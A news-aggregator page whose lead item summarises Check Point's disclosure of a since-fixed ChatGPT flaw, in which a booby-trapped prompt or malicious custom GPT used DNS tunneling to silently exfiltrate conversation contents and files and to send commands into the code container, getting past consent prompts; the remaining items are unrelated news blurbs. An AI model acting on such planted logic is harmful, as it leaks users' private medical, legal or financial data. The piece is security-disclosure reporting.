Friday, April 3, 2026

Early Signals

Small stories that could become big

The invisible risk: Can you really trust your ‘private’ AI assistant to keep your secrets?

The invisible risk: Can you really trust your ‘private’ AI assistant to keep your secrets?

Check Point Software Technologies discovered a vulnerability in ChatGPT’s internal runtime used for data analysis and Python tasks: even though normal outbound web traffic was blocked, DNS resolution remained available and could be abused for DNS tunneling. By embedding malicious logic in a prompt—or more insidiously, in a custom GPT—the attacker could turn ordinary user interactions into a covert exfiltration channel, hiding small chunks of data inside DNS lookup requests that would not trigger ChatGPT’s usual external-transfer safeguards like GPT Actions consent prompts. The research shows that once a user pasted a booby-trapped prompt or interacted with a malicious custom GPT, subsequent conversation contents, uploaded files, and especially the model’s own distilled summaries and conclusions could be siphoned off to an attacker-controlled server without any onscreen warning. Check Point emphasizes that this is more damaging than raw document theft because extracted insights (e.g., key clauses from a 30-page contract, likely medical diagnoses, or a distilled risk assessment from a financial spreadsheet) are exactly what attackers value most. In a proof-of-concept, they built a fake “personal doctor” GPT that appeared to behave normally while silently transmitting both patient identity from uploaded lab results and the model’s medical assessment via DNS tunneling. Beyond exfiltration, the same DNS-based channel could carry commands back into the Linux container hosting the code execution environment, effectively giving remote shell-like control that remained invisible in the chat UI. Check Point reported the issue to OpenAI; the company said it had already identified the underlying problem and fully deployed a fix on February 20, 2026. The article stresses that the incident underscores a broader structural risk: as AI assistants become full-fledged workspaces for code, document analysis, and sensitive decision support, trust hinges not just on model behavior but on the integrity of hidden runtime layers that most users cannot audit. The piece urges more cautious handling of prompts and custom GPTs, and calls for hands-on, continuously monitored AI security practices across platforms such as ChatGPT, Claude, and Gemini.

Jacob Laznikwww.jpost.com2 min read
Maharashtra Contractors Warn Of April 7 Shutdown Over Rs 96,000 Crore Dues

Maharashtra Contractors Warn Of April 7 Shutdown Over Rs 96,000 Crore Dues

Nearly 300,000 contractors in Maharashtra are threatening an indefinite shutdown of government projects from April 7 over roughly ₹96,000 crore in unpaid dues, a standoff that could stall infrastructure and civic works across India’s most industrialized state.

www.ndtvprofit.com2m
Falling cherry trees in Tokyo: A symbol of climate change and aging infrastructure

Falling cherry trees in Tokyo: A symbol of climate change and aging infrastructure

Tokyo’s aging Somei Yoshino cherry trees—many planted in the 1960s—are increasingly collapsing in parks due to age, fungal decay, and climate stress, forcing authorities into emergency inspections, partial felling, and ad hoc safety measures that could reshape Japan’s iconic hanami landscapes.

www.tribuneindia.com3m
Forget Vision Pro: Apple Glass “Early Look” Set for 2026 (Leaked)

Forget Vision Pro: Apple Glass “Early Look” Set for 2026 (Leaked)

Geeky-gadgets

Built a tool to track crypto influencer signals / would love feedback

r/programming
Anker’s Nebula P1 projector is the portable sound king

Anker’s Nebula P1 projector is the portable sound king

www.theverge.com

Reality check